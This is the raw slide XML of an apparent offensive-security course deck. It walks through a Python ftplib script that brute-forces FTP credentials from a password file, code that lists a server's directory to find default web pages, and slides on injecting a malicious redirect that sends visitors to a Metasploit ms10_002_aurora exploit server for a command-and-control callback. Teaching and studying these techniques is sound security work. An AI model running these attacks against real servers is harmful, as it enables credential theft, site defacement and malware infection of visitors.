                <a:sym typeface="Russo One"/>
              </a:rPr>
              <a:t>Using Ftplib to Brute Force FTP User Credentials Contd..</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="3200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Russo One"/>
              <a:ea typeface="Russo One"/>
              <a:cs typeface="Russo One"/>
              <a:sym typeface="Russo One"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="554" name="Google Shape;554;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426650" y="2201750"/>
            <a:ext cx="11061900" cy="4568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ftplib</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time</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brute_login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hostname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passwd_file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with</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passwd_file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ftplib</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hostname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readlines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time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sleep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split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0</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split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\r</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Trying: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endParaRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">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1fe188b01e2_0_51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180050" y="785650"/>
            <a:ext cx="9951600" cy="1071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Russo One"/>
                <a:ea typeface="Russo One"/>
                <a:cs typeface="Russo One"/>
                <a:sym typeface="Russo One"/>
              </a:rPr>
              <a:t>Using Ftplib to Brute Force FTP User Credentials Contd..</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="3200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Russo One"/>
              <a:ea typeface="Russo One"/>
              <a:cs typeface="Russo One"/>
              <a:sym typeface="Russo One"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="560" name="Google Shape;560;g1fe188b01e2_0_51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426650" y="2201750"/>
            <a:ext cx="11061900" cy="4568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try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login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hostname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FTP Logon Succeeded: '</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quit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password</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="E06C75"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="dk1"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="162857"/>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Exception</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62857"/>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Exception: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62857"/>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pass</a:t>
            </a:r>
            <a:endParaRPr b="0" i="1" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="C678DD"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="dk1"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="162857"/>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 Could not brute force FTP credentials.'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62857"/>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None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None</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="D19A66"/>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rgbClr val="E06C75"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="dk1"/>
              </a:highlight>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1fe188b01e2_0_57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180050" y="785650"/>
            <a:ext cx="9951600" cy="1071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Russo One"/>
                <a:ea typeface="Russo One"/>
                <a:cs typeface="Russo One"/>
                <a:sym typeface="Russo One"/>
              </a:rPr>
              <a:t>Using Ftplib to Brute Force FTP User Credentials Contd..</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="3200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Russo One"/>
              <a:ea typeface="Russo One"/>
              <a:cs typeface="Russo One"/>
              <a:sym typeface="Russo One"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="566" name="Google Shape;566;g1fe188b01e2_0_57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426650" y="2201750"/>
            <a:ext cx="11061900" cy="4568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62857"/>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__name__</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"__main__"</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62857"/>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'192.168.95.179'</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62857"/>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pass_file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'userpass.txt'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brute_login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pass_file</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>)</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e9adf94182_2_23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="33796" y="8350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latin typeface="Russo One"/>
                <a:ea typeface="Russo One"/>
                <a:cs typeface="Russo One"/>
                <a:sym typeface="Russo One"/>
              </a:rPr>
              <a:t>BUILDING A PORT SCANNER </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>CONTD..</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Russo One"/>
              <a:ea typeface="Russo One"/>
              <a:cs typeface="Russo One"/>
              <a:sym typeface="Russo One"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="231" name="Google Shape;231;g1e9adf94182_2_23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="109210" y="2087235"/>
            <a:ext cx="11472600" cy="4333261"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="349250" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>One type of pat scan includes sending a TCP SYN packet to a series of common ports and waiting for a TCP ACK response that will result in signaling an open port. In contrast, a TCP Connect Scan uses the full three-way handshake to determine the availability of the service or port.</a:t>
            </a:r>
            <a:endParaRPr sz="2500">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g1e9a65c21fa_26_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="271146" y="7696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Searching for Web Pages on the FTP Server</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="572" name="Google Shape;572;g1e9a65c21fa_26_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680320" y="2336873"/>
            <a:ext cx="11206879" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="368300" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>With credentials on the FTP server, we must now test if the server also provides web access. In order to test this, we will first list the contents of the FTP server's directory and search for default web pages.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="368300" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> The function returnDefault() takes an FTP connection as the input and returns an array of default pages it finds. It does this by issuing the command NLST, which lists the directory contents.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="368300" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> The function checks each file returned by NLST against default web page file names. It also appends any discovered default pages to an array called retList. After completing the iteration of these files, the function returns this array.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">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1e9a65c21fa_26_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="271146" y="7696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Searching for Web Pages on the FTP Server</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="578" name="Google Shape;578;g1e9a65c21fa_26_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="131975" y="3091018"/>
            <a:ext cx="11745797" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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This statement describes a process for testing if an FTP server also provides web access. Once an attacker has credentials for an FTP server, they can use them to connect and potentially upload or download files, including web pages. To test if the server also provides web access, the statement suggests using a function called returnDefault(), which takes an FTP connection as input and returns an array of default web pages it finds on the server.</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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The function uses the FTP command NLST (which stands for name list) to list the contents of the FTP server's directory. The NLST command returns a list of files and directories in the current directory of the FTP server. The function then checks each file returned by NLST against a list of default web page file names, such as "index.html" or "default.aspx". If a file matches one of these default web page names, it is considered a default page and is added to an array called retList.</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="579" name="Google Shape;579;g1e9a65c21fa_26_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="271146" y="2396160"/>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g1e9a65c21fa_26_12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="271146" y="7696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Searching for Web Pages on the FTP Server</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="585" name="Google Shape;585;g1e9a65c21fa_26_12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="271146" y="2695092"/>
            <a:ext cx="11206879" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1900"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Once the function has completed iterating through the files, it returns the retList array. This array contains the names of all the default web pages found on the server, indicating that the server also provides web access. With web access, an attacker can potentially upload or download files, including web pages, to the server and use it for malicious activities.</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1900"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>It's important to note that this kind of attack is not limited to just FTP, but can be done via other protocols like HTTP, SSH, or any other protocol that allows for file transfer. The attacker could use these web pages to redirect visitors to a malicious site, host malware, or steal personal information. Additionally, if the FTP server is configured to allow directory listing, an attacker can use the NLST command to list all the files and directories on the server and potentially find sensitive information.</a:t>
            </a:r>
            <a:endParaRPr sz="2500">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1e9a65c21fa_26_17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="271146" y="7696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Searching for Web Pages on the FTP Server</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="591" name="Google Shape;591;g1e9a65c21fa_26_17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="271146" y="2949616"/>
            <a:ext cx="11206879" cy="35994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sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>It's important to note that many web servers and hosting providers have security measures in place to prevent this kind of attack, such as disabling directory listing and using a web application firewall. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Additionally, it's important to keep the software and systems up to date to prevent known vulnerabilities, use strong and unique credentials, and monitor logs for any suspicious activities.</a:t>
            </a:r>
            <a:endParaRPr>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2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lang="en-US"/>
              <a:t>CODE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="597" name="Google Shape;597;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="325350" y="2191625"/>
            <a:ext cx="11376000" cy="4507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ftplib</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return_default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try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dir_list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nlst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Exception</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Could not list directory contents.</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Skipping To Next Target.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Exception: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ret_list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400" u="none" cap="none" strike="noStrike">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g1fe188b01e2_0_6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Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CODE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="603" name="Google Shape;603;g1fe188b01e2_0_64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="325350" y="2191625"/>
            <a:ext cx="11376000" cy="4507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dir_list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lower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'.php'</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fn</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'.htm'</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fn</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'.asp'</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fn</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Found default page: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ret_list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append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ret_list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__name__</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"__main__"</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'192.168.95.179'</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'guest'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'guest'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ftp_conn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ftplib</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ftp_conn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login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return_default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ftp_conn</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>)</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1e9a65c21fa_31_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="230196" y="9987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Adding a Malicious Inject to Web Pages</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200"/>
            </a:br>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="609" name="Google Shape;609;g1e9a65c21fa_31_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680326" y="2336875"/>
            <a:ext cx="11296500" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-336550" lvl="0" marL="342900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Now that we have found web page files, we must infect them with a malicious redirect. </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-336550" lvl="0" marL="342900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>We will use the Metasploit framework in order to quickly create a malicious server and page hosted at http://10.10.10.112:8080/exploit. Notice we choose the exploit ms 10_002 aurora, the very same exploit used during Operation Aurora against Google. </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-336550" lvl="0" marL="342900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The page at 10.10.10.11 2:8080/exploit will exploit redirected victims, which will provide a call back to our command and control server.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">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g1e9a65c21fa_31_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="230196" y="9987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Adding a Malicious Inject to Web Pages</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200"/>
            </a:br>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="615" name="Google Shape;615;g1e9a65c21fa_31_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="230201" y="3072175"/>
            <a:ext cx="11799000" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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This statement describes a process for infecting web page files with a malicious redirect. Once an attacker has access to web page files on an FTP server, they can use them to redirect visitors to a malicious site. The statement suggests using the Metasploit framework to quickly create a malicious server and page hosted at "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://10.10.10.112:8080/exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>."</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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Metasploit is a popular open-source framework that allows attackers to create and use exploit modules to compromise systems. In this scenario, the attacker is using the exploit module "ms10_002_aurora," which is a known exploit that was used in Operation Aurora against Google. The exploit module "ms10_002_aurora" is a browser-based exploit that targets a vulnerability in Internet Explorer and allows an attacker to execute arbitrary code.</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="616" name="Google Shape;616;g1e9a65c21fa_31_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="230196" y="2367880"/>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1e9a65c21fa_31_12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
